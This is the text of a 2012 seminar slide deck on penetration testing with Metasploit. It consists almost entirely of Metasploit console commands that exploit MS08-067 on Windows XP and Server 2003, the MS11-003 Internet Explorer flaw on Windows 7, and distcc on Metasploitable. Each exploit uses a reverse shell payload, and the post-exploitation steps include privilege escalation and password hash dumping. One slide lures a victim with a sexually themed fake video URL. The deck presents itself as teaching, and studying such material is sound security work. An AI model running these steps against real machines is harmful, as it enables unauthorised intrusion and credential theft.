penetration testing with metasploitPresented by Syarif 3xu5Seminar IT Security Safe The System Sumedang, April 29 2012 STMIK Sumedang

Sunday, April 29, 12

Agenda Why & Whats Penetration Testing ( Pentest ) set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(ms08_067_netapi) > show options msf exploit(ms08_067_netapi) > set RHOST 172.16.240.129 msf exploit(ms08_067_netapi) > set LHOST 172.16.240.143 msf exploit(ms08_067_netapi) > show options msf exploit(ms08_067_netapi) > exploit meterpreter > background session -l

Sunday, April 29, 12

Windows XP Post Exploitation

session -i 1 meterpreter > getsystem -h getuid hashdump

Sunday, April 29, 12

Windows 2003 Server Exploitation msf > search windows/smb msf > info exploit/windows/smb/ms08_067_netapi msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > show payloads msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(ms08_067_netapi) > show options msf exploit(ms08_067_netapi) > set RHOST 172.16.240.129 msf exploit(ms08_067_netapi) > set LHOST 172.16.240.143 msf exploit(ms08_067_netapi) > show options msf exploit(ms08_067_netapi) > exploit meterpreter > background session -l

Sunday, April 29, 12

Windows 7 Exploitation msf > use exploit/windows/browser/ms11_003_ie_css_import msf exploit(ms11_003_ie_css_import) > set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(ms11_003_ie_css_import) > show options msf exploit(ms11_003_ie_css_import) > set SRVHOST 172.16.240.143 msf exploit(ms11_003_ie_css_import) > set SRVPORT 80 msf exploit(ms11_003_ie_css_import) > set URIPATH miyabi-naked.avi msf exploit(ms11_003_ie_css_import) > set LHOST 172.16.240.143 msf exploit(ms11_003_ie_css_import) > set LPORT 443 msf exploit(ms11_003_ie_css_import) > exploit

Just wait until the victim open the url http://172.16.240.143:80/miyabi-naked.avi

Sunday, April 29, 12

Windows 7 Exploitation

msf exploit(ms11_003_ie_css_import) > sessions -l msf exploit(ms11_003_ie_css_import) > sessions -i 1 meterpreter > sysinfo meterpreter > shell

Sunday, April 29, 12

Ubuntu 8.04 Metasploitable Exploitation

Sunday, April 29, 12

search distcc use exploit/unix/misc/distcc_exec show payloads set PAYLOAD cmd/unix/reverse show options set rhost 172.16.240.144 set lhost 172.16.240.143 exploit

Any Question ?Contact me

website : http://3x.us Ofcial BackTrack Indonesia Community :http://indobacktrack.or.id

Email : 3xu5@indobacktrack.or.id twitter : @3xu5Sunday, April 29, 12

Greet & Thanks To BackTrack Linux Metasploit Team ( HD Moore & rapid7 ) Offensive Security / Metasploit Unleashed David Kennedy Georgia WeidmanSunday, April 29, 12

References Sunday, April 29, 12

1. Metasploit The Penetration Testers Guide : David Kennedy , Jim OGorman, Devon Kearns, Mati Aharoni 2. http://www.metasploit.com 3. http://www.offensive-security.com/metasploitunleashed/Main_Page 4. http://www.pentest-standard.org/index.php/ PTES_Technical_Guidelines